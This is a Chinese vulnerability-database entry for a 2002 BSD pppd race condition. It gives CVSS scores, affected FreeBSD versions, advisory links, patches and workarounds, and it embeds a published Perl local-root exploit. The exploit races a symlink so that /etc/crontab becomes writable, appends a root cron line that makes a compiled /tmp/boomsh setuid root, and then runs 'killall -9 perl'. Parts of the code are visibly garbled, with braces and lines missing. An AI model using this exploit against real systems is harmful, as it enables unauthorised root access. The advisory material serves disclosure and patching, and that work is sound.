发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:22:12

[原文]BSD pppd allows local users to change the permissions of arbitrary files via a symlink attack on a file that is specified as a tty device.

[CNNVD]多个Vendor BSD pppd任意文件许可修改竞争条件漏洞(CNNVD-200208-093)

        BSD pppd存在漏洞。本地用户可以借助tty设备指定文件的符号链接改变任意文件许可。

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:2.2.7FreeBSD 2.2.7
cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:2.2.1FreeBSD 2.2.1
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:2.1.7FreeBSD 2.1.7
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1
cpe:/o:freebsd:freebsd:1.1FreeBSD 1.1
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/o:freebsd:freebsd:1.1.5FreeBSD 1.1.5
cpe:/a:samba:pppSamba ppp
cpe:/o:freebsd:freebsd:2.2FreeBSD 2.2
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/o:freebsd:freebsd:1.0FreeBSD 1.0
cpe:/o:freebsd:freebsd:3.4FreeBSD 3.4
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:freebsd:freebsd:3.3FreeBSD 3.3
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:32.pppd
(UNKNOWN)  XF  pppd-race-condition(9738)
(UNKNOWN)  OPENBSD  20020729 011: SECURITY FIX: July 29, 2002
(UNKNOWN)  BID  5355

- 漏洞信息

多个Vendor BSD pppd任意文件许可修改竞争条件漏洞
低危 竞争条件
2002-08-12 00:00:00 2005-09-14 00:00:00
        BSD pppd存在漏洞。本地用户可以借助tty设备指定文件的符号链接改变任意文件许可。

- 公告与补丁

        NetBSD has reissued their advisory. Users are strongly urged to upgrade systems to NetBSD 1.6 which is not vulnerable to this issue. Further details are available in the referenced advisory.
        Patches are available:
        OpenBSD OpenBSD 3.1
        OpenBSD OpenBSD 3.0
        FreeBSD FreeBSD 4.4
        FreeBSD FreeBSD 4.4 -STABLE
        FreeBSD FreeBSD 4.4 -RELENG
        FreeBSD FreeBSD 4.5 -STABLE
        FreeBSD FreeBSD 4.5
        FreeBSD FreeBSD 4.5 -RELEASE
        FreeBSD FreeBSD 4.6
        FreeBSD FreeBSD 4.6 -RELEASE
        FreeBSD FreeBSD 4.6 -STABLE

- 漏洞信息 (21669)

FreeBSD 4.x,NetBSD 1.4.x/1.5.x/1.6,OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition (EDBID:21669)
bsd local
2002-07-29 Verified
0 Sebastian Krahmer
N/A [点击下载]

A vulnerability has been reported in some versions of the pppd daemon included with multiple BSD distributions.

A race condition error in the code may result in the pppd process changing the file permissions on an arbitrary system file. pppd will generally run as a privileged user.

This issue has been reported in OpenBSD versions 3.0 and 3.1. Earlier versions of OpenBSD may share this vulnerability, this has not however been confirmed. 


# Local root exploit for AnyBSD. Tested on my 4.3 FBSD homebox.
# (C) 2002 Sebastian Krahmer -- stealth at segfault dot net ;-))
# NOT for abuse but for educational purposes only.
# Exploit description:
# The BSD pppd allows users to open any file even if its root owned.
# It then tries to set apropriate terminal attributes on the filedescriptor
# if a connection-script is given. As if it isn't bad enough that it allows
# you to open roots console for example it also has a race: If the tcgetattr()
# fails it calls some cleanup routines which use chown() to restore the mode
# of the terminal (at least it ASSUMES it is an terminal). It should rather use
# the tty_fd to restore the mode because between open() and tcgetattr failure+chown()
# we link the file to /etc/crontab which will then have the mode of the former file
# (which is probably 0666 :)

# Some code snippets.
# The vulnerable open():
# ...
#        /*
#         * Open the serial device and set it up to be the ppp interface.
#         * First we open it in non-blocking mode so we can set the
#         * various termios flags appropriately.  If we aren't dialling
#         * out and we want to use the modem lines, we reopen it later
#         * in order to wait for the carrier detect signal from the modem.
#         */
#       while ((ttyfd = open(devnam, O_NONBLOCK | O_RDWR, 0)) < 0) {
#            if (errno != EINTR)
#                syslog(LOG_ERR, "Failed to open %s: %m", devnam);
#            if (!persist || errno != EINTR)
#                goto fail;
#       }
# ...
# close_tty() which is called during cleanup because tcgetattr() of
# the fd will fail:
# static void
# close_tty()
# {
#    disestablish_ppp(ttyfd);
#   /* drop dtr to hang up */
#    if (modem) {
#        setdtr(ttyfd, FALSE);
#        /*
#         * This sleep is in case the serial port has CLOCAL set by default,
#         * and consequently will reassert DTR when we close the device.
#         */
#        sleep(1);
#    }
#    restore_tty(ttyfd);
#    if (tty_mode != (mode_t) -1)
#        chmod(devnam, tty_mode);
#    close(ttyfd);
#    ttyfd = -1;
# }
# The chmod() bangs.
# Fix suggestion: use fchmod() instead of chmod() and do not allow
# users to open root owned files.

# ok, standard init ...
umask 0;

system("cp /etc/crontab /tmp/crontab");

# create evil .ppprc to catch right execution path in pppd
open O, ">.ppprc" or die $!;
print O "/dev/../tmp/ppp-device\n".
        "connect /tmp/none\n";

close O;

print "Starting ... You can safely ignore any error messages and lay back. It can take some\n".

# create a boomsh to be made +s
# fork off a proc which constantly creates a mode 0666
# file and a link to /etc/crontab. crontab file will "inherit"
# the mode then
if (fork() == 0) {

# fork off own proc which inserts command into crontab file
# which is then executed as root
if (fork() == 0) {

my $child;

# start pppd until race succeeds!
for (;;) {
	if (($child = fork()) == 0) {
		exec ("/usr/sbin/pppd");

	last if (((stat("/tmp/boomsh"))[2] & 04000) == 04000);

# ok, we have a lot of interpreters running due to fork()'s
# so kill them...
if (fork() == 0) {
	system("killall -9 perl");

# thats all folks! ;-)


sub create_boomsh
	open O, ">/tmp/boomsh.c" or die $!;
	print O "int main() { char *a[]={\"/bin/sh\", 0}; setuid(0); ".
	        "system(\"cp /tmp/crontab /etc/crontab\"); execve(*a,a,0); return 1;}\n";
	close O;
	system("cc /tmp/boomsh.c -o /tmp/boomsh");

sub play_tricks
	my $file = shift;
	for (;;) {
		open O, ">$file";
		close O;

		# On the OpenBSD box of a friend 0.01 as fixed value
		# did the trick. on my FreeBSD box 0.1 did.
		# maybe you need to play here
		select undef, undef, undef, rand 0.3;
		symlink("/etc/crontab", $file);

sub watch_crontab
	for (;;) {
		open O, ">>/etc/crontab" or next;
		print "Race succeeded! Waiting for cron ...\n";
		print O "\n* * * * * root chown root /tmp/boomsh;chmod 04755 /tmp/boomsh\n"; 
		close O;


- 漏洞信息

Multiple BSD pppd Race Condition Arbitrary File Permission Modification
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- 漏洞描述

Multiple BSD OSs contain a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to pppd changing the permissions of arbitrary files via a symlink attack on a file that is specified as a tty device, resulting in a loss of integrity.

- 时间线

2002-07-29 Unknow
2002-07-29 Unknow

- 解决方案

Upgrade to FreeBSD version 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p2, 4.5-RELEASE-p11, or 4.4-RELEASE-p18) or higher, as it has been reported to fix this vulnerability. In addition, FreeBSD has released a patch for some older versions. Upgrade to OpenBSD version 3.1 dated after the correction date or higher, as it has been reported to fix this vulnerability. In addition, OpenBSD has released a patch for some older versions. Upgrade to NetBSD version 1.6 dated after the correction date or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the setuid bit from pppd. However, this will likely affect required functionality.

- 相关参考

- 漏洞作者